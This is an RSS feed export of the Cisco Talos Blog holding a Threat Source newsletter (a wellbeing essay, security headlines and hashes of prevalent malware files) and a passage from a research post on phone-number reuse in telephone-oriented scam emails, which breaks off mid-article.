<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Cisco Talos Blog]]></title><description><![CDATA[Talos intelligence and world-class threat research team better protects you and your organization against known and emerging cybersecurity threats.]]></description><link>https://blog.talosintelligence.com/</link><image><url>https://blog.talosintelligence.com/favicon.png</url><title>Cisco Talos Blog</title><link>https://blog.talosintelligence.com/</link></image><generator>Ghost 6.36</generator><lastBuildDate>Thu, 07 May 2026 18:02:01 GMT</lastBuildDate><atom:link href="https://blog.talosintelligence.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Unplug your way to better code]]></title><description><![CDATA[Cybersecurity concepts — logs, packets, DNS exfiltration, and more — are usually intangible, and its practitioners are prone to mental fatigue, Amy takes a second to yell at you to go touch grass.]]></description><link>https://blog.talosintelligence.com/unplug-your-way-to-better-code/</link><guid isPermaLink="false">69fb91cb525fa5000158eb68</guid><category><![CDATA[Threat Source newsletter]]></category><dc:creator><![CDATA[Amy Ciminnisi]]></dc:creator><pubDate>Thu, 07 May 2026 18:00:40 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_source.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_source.jpg" alt="Unplug your way to better code"><p>Welcome to this week&#x2019;s edition of the Threat Source newsletter.</p><p>Hey, you. Yeah, you! The person endlessly scrolling or typing away at their computer. Did you touch grass today? It&apos;s just an expression, but if nature&#x2019;s your thing, that works just fine.</p><p>What I do mean is that due to the nature of the field, cybersecurity is incredibly intangible. You can&#x2019;t reach out and touch your logs, or the packets traversing your network, or the concept of DNS exfiltration... and if you tried, you&#x2019;d just feel the smooth surface of your computer screen. (What a boring texture.) Spending all our time in the abstract can create some serious mental fatigue.</p><p>My point is that there&#x2019;s something powerful to be said about engaging with the physical world. When we engage in a tactile hobby, we give our brains a hard reset. By moving from the abstract to the physical, our brains get the time and space to process the complex problems we&#x2019;ve been staring at, often leading to the &#x201C;aha!&#x201D; moment that never comes when you&apos;re trying to force it.</p><p>The other week, I was working in the Talos office with the Creative team. It was a quiet afternoon, people&#x2019;s energy sapped by stomachs full of Mediterranean food. That was swiftly interrupted (in the best way) when Joe Marshall came over into our work area with his miniature painting kit, broke it open, and started teaching us how to drybrush 3D-printed figurines. Everyone immediately came alive. While I didn&#x2019;t partake (I know, &#x201C;Do as I say, not as I do&#x201D;), it reminded me of how revitalized I feel when I get outside for a walk during lunch or spend 10 minutes knitting in silence between meetings. There&#x2019;s nothing to focus on but the feel of the yarn between your fingers, the clacking of the needles, and the repetitive motions that result in a physical object you can wear and fish for compliments about.</p><p>Speaking of, do you think the vest I knit is cool? All compliments can be sent to me on LinkedIn, and I refuse to accept any negative comments. (Critiques are fine.)</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/vest-transparent.png" class="kg-image" alt="Unplug your way to better code" loading="lazy" width="2000" height="889" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/vest-transparent.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/vest-transparent.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/vest-transparent.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/vest-transparent.png 2400w" sizes="(min-width: 720px) 720px"></figure><p>Ahem... anyway. Go on a walk without your earbuds, listen to the wind through the leaves, ask a stranger to pet their dog, watch a pigeon bop its head around, and reach out to touch a cool-looking rock or the lichen on a tree. I hear you saying, &quot;That&#x2019;s some tree-hugging bullshit,&#x201D; and counter you with, &#x201C;Just humor me, okay? What&#x2019;s the worst that could happen?&#x201D;</p><p>If you&#x2019;re more of an inside person, the goal might be to find a physical anchor for your technical interest. Maybe it&#x2019;s building a mechanical keyboard from scratch &#x2014; feeling the weight of the switches and hearing the click of the keycaps. Maybe it&#x2019;s a complicated LEGO set. Even something as simple as making espresso or organizing your bookshelf can provide that sensory feedback your brain is craving.</p><p>If you&apos;re not currently facing a life-altering deadline, take 10 minutes and try it now. The rest of the newsletter isn&#x2019;t going anywhere, I promise.</p><p>When you pay attention to the noises you hear, the colors you see, and the textures under your fingertips, you might come back to your laptop refreshed, focused, and ready to solve the next problem.</p><h2 id="the-one-big-thing">The one&#xA0;big thing&#xA0;</h2><p>Cisco Talos has recently expanded our threat&#xA0;intelligence capabilities to track phone numbers as critical indicators of compromise (IOCs) in&#xA0;scam&#xA0;emails.&#xA0;<a href="https://blog.talosintelligence.com/insights-into-the-clustering-and-reuse-of-phone-numbers-in-scam-emails/" rel="noreferrer noopener"><u>Our latest research</u></a>&#xA0;reveals that attackers heavily favor API-driven VoIP numbers to execute high-volume, cost-effective Telephone-Oriented Attack Delivery (TOAD) campaigns. To evade detection, these threat actors rotate through sequential blocks of numbers, use strategic cool-down periods, and recycle the exact same digits across completely unrelated lures and impersonated brands.&#xA0;</p><h3 id="why-do-i-care">Why do I care?&#xA0;</h3><p>Tracking ephemeral sender email addresses is a losing game, but phone numbers are the true operational anchors for these organized&#xA0;scam&#xA0;call centers. Because attackers reuse these numbers across multiple document types and brand impersonations, defenders who&#xA0;cluster&#xA0;this telephony infrastructure can expose the broader network of malicious activity. Understanding these reuse patterns gives defenders a much-needed edge in mapping out and dismantling these operations before users are manipulated into handing over sensitive data.&#xA0;</p><h3 id="so-now-what">So now what?&#xA0;</h3><p>Security teams should shift their focus toward clustering&#xA0;scam&#xA0;lures based on shared phone numbers and prioritize real-time reputation monitoring to flag high-risk infrastructure. Deploying an AI-powered email security solution like Cisco Secure Email Threat Defense can also help evaluate different portions of incoming emails to catch these targeted threats. A full list of indicators of compromise (IOCs) associated with these campaigns can be found&#xA0;<a href="https://blog.talosintelligence.com/insights-into-the-clustering-and-reuse-of-phone-numbers-in-scam-emails/" rel="noreferrer noopener"><u>in the blog</u></a>.</p><h2 id="top-security-headlines-of-the-week">Top security headlines of the week&#xA0;</h2><p><strong>DigiCert</strong>&#xA0;<strong>revokes</strong>&#xA0;<strong>certificates</strong>&#xA0;<strong>after</strong>&#xA0;<strong>support</strong>&#xA0;<strong>portal</strong>&#xA0;<strong>hack</strong>&#xA0;<br>The attack, the company said in a detailed&#xA0;report, occurred on April 2, when a threat actor targeted DigiCert&#x2019;s support team with a malicious payload delivered via a customer chat channel, disguised as a screenshot. (<a href="https://www.securityweek.com/digicert-revokes-certificates-after-support-portal-hack/" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><p><strong>Ubuntu services hit by outages after DDoS attack</strong>&#xA0;<br>The DDoS-for-hire service in this case claims to power attacks&#xA0;in excess of&#xA0;3.5&#xA0;Tbps, which is about half of the bandwidth of a cyberattack that&#xA0;Cloudflare last year&#xA0;called the &#x201C;largest DDoS attack ever recorded.&#x201D; (<a href="https://techcrunch.com/2026/05/01/ubuntu-services-hit-by-outages-after-ddos-attack/?utm_source=tldrinfosec" rel="noreferrer noopener"><u>TechCrunch</u></a>)&#xA0;</p><p><strong>Canvas maker Instructure reveals data breach</strong>&#xA0;<br>Instructure said the actors accessed &#x201C;certain identifying information of users&#x201D; at affected institutions, including names, email addresses, student ID numbers, and user communications. (<a href="https://www.techradar.com/pro/security/canvas-maker-instructure-reveals-data-breach-confirms-user-personal-information-leaked" rel="noreferrer noopener"><u>Tech Radar</u></a>)&#xA0;</p><p><strong>Exploitation of &#x201C;Copy Fail&#x201D; Linux vulnerability begins</strong>&#xA0;<br>Threat actors are exploiting a recently disclosed Linux kernel vulnerability leading to root shell access, the US cybersecurity agency CISA warns. Dubbed Copy&#xA0;Fail,&#xA0;the security defect&#xA0;impacts&#xA0;all Linux distributions since 2017. (<a href="https://www.securityweek.com/exploitation-of-copy-fail-linux-vulnerability-begins/" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><p><strong>Student hacked Taiwan high-speed rail to trigger emergency brakes</strong>&#xA0;<br>According to&#xA0;local reports, the student halted four trains for 48 minutes by using software-defined radio (SDR) communications and handheld radios to&#xA0;transmit&#xA0;a high-priority &#x201C;General Alarm&#x201D; signal, triggering emergency braking procedures. (<a href="https://www.bleepingcomputer.com/news/security/student-hacked-taiwan-high-speed-rail-to-trigger-emergency-brakes/" rel="noreferrer noopener"><u>BleepingComputer</u></a>)&#xA0;</p><h2 id="can%E2%80%99t-get-enough-talos">Can&#x2019;t&#xA0;get enough Talos?&#xA0;</h2><p><a href="https://cs.co/IRTales-2026-Q1" rel="noreferrer noopener"><strong><u>Tales</u></strong>&#xA0;<strong><u>from the Frontlines</u></strong></a>&#xA0;<br>In this briefing,&#xA0;we&#x2019;ll&#xA0;share behind-the-scenes insights from the most critical and high-impact incidents we responded to in the last quarter. This&#xA0;isn&apos;t&#xA0;a&#xA0;report&#xA0;walkthrough;&#xA0;it&apos;s&#xA0;a&#xA0;look at what really happened, how we handled it, and what it means for your organization.&#xA0;</p><p><a href="https://blog.talosintelligence.com/uat-8302/" rel="noreferrer noopener"><strong><u>UAT-8302 and its box full of malware</u></strong></a>&#xA0;<br>Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus&#xA0;APT&#xA0;group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.&#xA0;</p><p><a href="https://blog.talosintelligence.com/cloudz-pheno-infostealer/" rel="noreferrer noopener"><strong><u>CloudZ RAT potentially steals OTP messages using Pheno plugin</u></strong></a>&#xA0;<br>Cisco Talos&#xA0;discovered&#xA0;an intrusion,&#xA0;active since&#xA0;at least&#xA0;January 2026,&#xA0;where an unknown attacker implanted a&#xA0;CloudZ&#xA0;remote access&#xA0;tool (RAT)&#xA0;and&#xA0;a previously undocumented plugin called &#x201C;Pheno.&#x201D;&#xA0;</p><p><a href="https://www.buzzsprout.com/2018149/episodes/19135351" rel="noreferrer noopener"><strong><u>The trust paradox: How attackers weaponize legitimate SaaS platforms</u></strong></a>&#xA0;<br>In this episode of Talos Takes, Amy Ciminnisi sits down with researcher Diana Brown to discuss the rise of &quot;platform-as-a-proxy&quot; (PAP) attacks.&#xA0;</p><h2 id="upcoming-events-where-you-can-find-talos">Upcoming events where you can find Talos&#xA0;</h2><ul><li><a href="https://pivotcon.org/" rel="noreferrer noopener"><u>PIVOTcon</u></a>&#xA0;(May 6 &#x2013; 8) M&#xE1;laga, Spain&#xA0;</li><li><a href="https://www.offensivecon.org/" rel="noreferrer noopener"><u>OffensiveCon</u></a>&#xA0;(May 15 &#x2013; 16)&#xA0;Berlin, Germany&#xA0;</li><li><a href="https://www.ciscolive.com/global.html?zid=pp" rel="noreferrer noopener"><u>Cisco Live U.S.</u></a>&#xA0;(May 31&#xA0;&#x2013;&#xA0;June 4) Las Vegas, Nevada&#xA0;</li></ul><h2 id="most-prevalent-malware-files-from-talos-telemetry-over-the-past-week">Most prevalent malware files from Talos telemetry over the past week&#xA0;</h2><p><strong>SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</strong>&#xA0;&#xA0;<br>MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;VID001.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Worm.Coinminer::1201**&#xA0;</p><p><strong>SHA256:</strong>&#xA0;<strong>96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</strong>&#xA0;&#xA0;<br>MD5: aac3165ece2959f39ff98334618d10d9&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;d4aa3e7010220ad1b458fac17039c274_63_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Injector:Gen.21ie.1201&#xA0;</p><p><strong>SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</strong>&#xA0;&#xA0;<br>MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;APQ9305.dll&#xA0;&#xA0;<br>Detection Name: Auto.90B145.282358.in02&#xA0;</p><p><strong>SHA256:</strong>&#xA0;<strong>e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba</strong>&#xA0;&#xA0;<br>MD5: dbd8dbecaa80795c135137d69921fdba&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba</u></a>&#xA0;&#xA0;<br>Example Filename: u112417.dat&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Variant:MalwareXgenMisc.29d4.1201&#xA0;</p><p><strong>SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</strong>&#xA0;<br>MD5: 7bdbd180c081fa63ca94f9c22c457376&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</u></a>&#xA0;&#xA0;<br>Example Filename: d4aa3e7010220ad1b458fac17039c274_62_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Dropper.Miner::95.sbx.tg**&#xA0;</p>]]></content:encoded></item><item><title><![CDATA[Insights into the clustering and reuse of phone numbers in scam emails]]></title><description><![CDATA[Talos has recently started to collect and gather intelligence around phone numbers within emails as an additional indicator of compromise (IOC). In this blog, we discuss new insights into in-the-wild phone number reuse in scam emails.]]></description><link>https://blog.talosintelligence.com/insights-into-the-clustering-and-reuse-of-phone-numbers-in-scam-emails/</link><guid isPermaLink="false">69fa0d8a1abe200001ff3a84</guid><category><![CDATA[On The Radar]]></category><category><![CDATA[Landing Page Top Story]]></category><category><![CDATA[Top Story]]></category><category><![CDATA[Cisco Talos Email Threat Prevention]]></category><dc:creator><![CDATA[Omid Mirzaei]]></dc:creator><pubDate>Wed, 06 May 2026 10:00:12 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/phone-number-scams.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>Cisco&#xA0;Talos has recently&#xA0;started to collect and gather intelligence around phone numbers&#xA0;within emails&#xA0;as an&#xA0;additional&#xA0;indicator of compromise (IOC).&#xA0;In this blog, we discuss&#xA0;new insights into&#xA0;in-the-wild&#xA0;phone number reuse&#xA0;in&#xA0;scam&#xA0;emails.&#xA0;&#xA0;</li><li>According to&#xA0;Talos&#x2019;&#xA0;observations,&#xA0;the ease of API-driven provisioning makes a few VoIP providers the preferred tool for attackers, allowing for high-volume, cost-effective&#xA0;scam&#xA0;operations that are difficult to trace.&#xA0;</li><li>Attackers&#xA0;maintain&#xA0;operational continuity by rotating through sequential blocks of phone numbers and&#xA0;utilizing&#xA0;strategic cool-down periods, with a median phone number lifespan of&#xA0;14&#xA0;days, to effectively evade reputation-based security filters.&#xA0;</li><li>Threat actors try to maximize their reach by recycling the same phone numbers across diverse,&#xA0;seemingly unrelated&#xA0;lures - including varied subject lines and different attachment formats like HEIC and PDF - to impersonate multiple brands simultaneously.&#xA0;</li><li>Security researchers can expose the hidden infrastructure of organized&#xA0;scam&#xA0;call centers by shifting focus from ephemeral email addresses to phone numbers, using clustering techniques to connect disparate campaigns and strengthen overall defensive postures.</li></ul><hr><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/phone-number-scams.jpg" alt="Insights into the clustering and reuse of phone numbers in scam emails"><p>Telephone-oriented&#xA0;attack&#xA0;delivery (TOAD) continues to be a prevalent tactic in modern email threats. By shifting the communication channel from email to a real-time conversation, attackers manipulate victims into&#xA0;disclosing&#xA0;sensitive information or installing malicious software.&#xA0;</p><p>Cisco Talos has expanded its threat intelligence capabilities to include phone numbers as a critical IOC. Our analysis covers a wide spectrum of line types, including wireless (cellular), landline, and Voice over Internet Protocol (VoIP). While scammers leverage all three, VoIP numbers are particularly prevalent due to their ease of acquisition and the difficulty of tracing them back to their origin. In fact, six of the ten largest campaigns we detected between February 26 and March 31, 2026 relied on VoIP infrastructure.</p><p>To better understand how these numbers are weaponized, this blog first explains the technical structure of VoIP numbers and the role of service providers in this ecosystem. We then broaden&#xA0;the&#xA0;scope to analyze reuse patterns, lifespan, and campaign characteristics across all line types. By sharing these insights,&#xA0;Talos&#xA0;aims to strengthen our collective defensive posture against these evolving threats.</p><h2 id="the-structure-of-voip-phone-numbers">The structure of VoIP phone numbers&#xA0;</h2><p>Most VoIP numbers follow the E.164 international public telecommunication numbering plan. This format ensures that every number is globally unique and can be routed correctly across the Public Switched Telephone Network (PSTN).&#xA0;</p><p>An E.164 number is limited to 15 digits and consists of:&#xA0;</p><ol><li>International Prefix (+):&#xA0;Indicates&#xA0;the number is in international format&#xA0;</li><li>Country Code (CC): 1 to 3 digits (e.g., 1 for the US/Canada, 44 for the UK)&#xA0;</li><li>Area Code/National Destination Code (NDC): Often referred to as the area code&#xA0;</li><li>Subscriber Number (SN): The specific number assigned to the user or device&#xA0;</li></ol><p>The above components are shown in the example phone number below:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Phone-number-reuse-01-1.jpg" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="2000" height="937" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Phone-number-reuse-01-1.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Phone-number-reuse-01-1.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Phone-number-reuse-01-1.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Phone-number-reuse-01-1.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;1. The structure of an example VoIP phone number.</span></figcaption></figure><h2 id="the-voip-ecosystem">The VoIP ecosystem&#xA0;</h2><p>Voice over Internet Protocol (VoIP) has become the primary medium for&#xA0;scam&#xA0;campaigns&#xA0;due to its cost&#xA0;effectiveness, ease of deployment, and API-driven automation. Within this ecosystem,&#xA0;we&#xA0;identify&#xA0;two primary operational models: wholesalers and retailers. VoIP wholesalers (e.g., Virtue, Twilio, and Bandwidth)&#xA0;operate&#xA0;in a&#xA0;business-to-business (B2B) capacity, sitting between Tier&#xA0;1 carriers (e.g., AT&amp;T, Verizon) and smaller service providers, selling high volumes of numbers in bulk. Conversely, VoIP retailers (e.g., RingCentral) sell finished business calling and collaboration solutions directly to organizations and end&#xA0;users.&#xA0;</p><p>VoIP providers are further categorized into&#xA0;communications&#xA0;platform&#xA0;as&#xA0;a&#xA0;service (CPaaS) and unified communications as a service (UCaaS).&#xA0;CPaaS&#xA0;providers offer programmable APIs that allow developers to integrate voice and messaging directly into applications. Because these platforms are designed for automation and high-volume traffic, they are&#xA0;frequently&#xA0;exploited by threat actors for rapid, API-driven number provisioning.&#xA0;In contrast,&#xA0;UCaaS&#xA0;providers offer comprehensive, end-user-facing communication suites.&#xA0;UCaaS&#xA0;platforms are typically designed for legitimate enterprise collaboration, and that makes them less attractive for&#xA0;scam email campaigns.&#xA0;Talos has found Sinch&#xA0;(primarily a leader in&#xA0;CPaaS)&#xA0;as the&#xA0;most commonly&#xA0;abused&#xA0;VoIP provider, and&#xA0;Verizon and NUSO as the least abused providers in the studied time window.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Phone-number-reuse-03-1.jpg" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="2000" height="975" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Phone-number-reuse-03-1.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Phone-number-reuse-03-1.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Phone-number-reuse-03-1.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Phone-number-reuse-03-1.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;2. The distribution of phone line types in&#xA0;scam&#xA0;emails.</span></figcaption></figure><p>While VoIP line types dominate the&#xA0;scam&#xA0;landscape&#xA0;(see Figure&#xA0;2), Talos has observed that threat actors utilize wireless (cellular) and landline numbers as well. Cellular numbers are harder to provision at scale, as they typically require physical SIM cards and stricter customer verification, making them more expensive and less disposable than VoIP numbers.&#xA0;Nevertheless, they are still widely adopted by scammers.&#xA0;Figure&#xA0;3&#xA0;shows the distribution&#xA0;of wireless carriers that&#xA0;are used byscammers in the studied time window.&#xA0;Landline numbers, on the other hand,&#xA0;are used to project a sense of local presence or established business legitimacy. By using a landline with a specific local area code, scammers can effectively impersonate local businesses (e.g., banks, utility companies, or government offices).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Phone-number-reuse-02-2.jpg" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="2000" height="1227" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Phone-number-reuse-02-2.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Phone-number-reuse-02-2.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Phone-number-reuse-02-2.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Phone-number-reuse-02-2.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;3. The distribution of&#xA0;carrier names in wireless phone numbers&#xA0;found&#xA0;in&#xA0;scam&#xA0;emails.</span></figcaption></figure><h2 id="phone-number-reuse-and-lifespan-in-scam-campaigns">Phone number&#xA0;reuse and lifespan in&#xA0;scam&#xA0;campaigns&#xA0;</h2><p>In this section, we provide insights into the lifecycle of phone numbers used in&#xA0;scam&#xA0;emails, examining how often they are reused, their typical lifespan, and how they appear across&#xA0;seemingly unrelated&#xA0;lures. Our analysis focuses on&#xA0;scam&#xA0;campaigns impersonating popular brands, including PayPal, Geek Squad (Best Buy), McAfee, and Norton LifeLock.&#xA0;</p><h3 id="phone-number-reuse-patterns">Phone&#xA0;number&#xA0;reuse&#xA0;patterns&#xA0;</h3><p>Talos&#xA0;identified&#xA0;1,652 unique phone numbers across these campaigns during the studied time window (February 26 to March 31). Of these, 57&#xA0;numbers (approximately 3.4%) were reused across multiple consecutive days. The longest period of reuse&#xA0;observed&#xA0;for a single phone number was four consecutive days.&#xA0;</p><p>As discussed in&#xA0;a&#xA0;<a href="https://blog.talosintelligence.com/pdfs-portable-documents-or-perfect-deliveries-for-phish/" rel="noreferrer noopener"><u>previous</u>&#xA0;<u>blog post</u></a>, phone numbers are reused for several strategic reasons. First, intelligence regarding phone numbers is often distributed more slowly than that of URLs or file hashes; many numbers remain under the radar of third-party reputation services for several days. Second, reuse offers logistical advantages for scam call centers, allowing them to maintain a consistent brand presence for multi-stage social engineering, callback scheduling, and persistent victim engagement. Finally, reuse minimizes operational costs, particularly for paid VoIP services. While we observed some phone numbers reused for up to four consecutive days, the most common reuse period was two consecutive days.</p><h3 id="lifespan-analysis-and-cool-down-periods">Lifespan analysis and cool-down periods&#xA0;</h3><p>Scammers do not always reuse phone numbers on consecutive days. Often, they implement a cool-down period&#xA0;&#x2014;&#xA0;pausing the use of a number for a few days to evade detection&#xA0;&#x2014;&#xA0;before reintroducing it into a campaign.&#xA0;</p><p>Our investigation into the lifespan of these numbers revealed that 108 phone numbers (~6.5%) remained active for more than one day. As shown in Figure 4, most phone numbers have a lifespan of two to six days, though a handful remained active for nearly a month. During the study window, the median lifespan was approximately 14 days. Notably, infrastructure longevity often correlates with the impersonated brand; as illustrated in Figure 5, PayPal-themed scam campaigns utilized significantly more persistent phone numbers than those impersonating Norton LifeLock.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Phone-number-reuse-04-1.jpg" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="2000" height="1253" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Phone-number-reuse-04-1.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Phone-number-reuse-04-1.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Phone-number-reuse-04-1.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Phone-number-reuse-04-1.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;4. The&#xA0;distribution of&#xA0;phone number&#xA0;lifespans&#xA0;(in days)&#xA0;in&#xA0;scam emails&#xA0;impersonating&#xA0;the above four&#xA0;brands.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Phone-number-reuse-05-1.jpg" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="2000" height="1168" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Phone-number-reuse-05-1.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Phone-number-reuse-05-1.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Phone-number-reuse-05-1.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Phone-number-reuse-05-1.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;5. The lifespan of phone numbers in&#xA0;scam&#xA0;emails for the top two impersonated brands.</span></figcaption></figure><h3 id="phone-numbers-across-unrelated-lures">Phone numbers across unrelated lures&#xA0;</h3><p>A&#xA0;scam&#xA0;or phishing&#xA0;lure is typically a combination of a business context, a psychological trigger, a call-to-action, and an impersonated brand (see Table 1 for&#xA0;a few&#xA0;examples). These lures appear across various email layers, including subject lines, body content, and attachments.</p>
<!--kg-card-begin: html-->
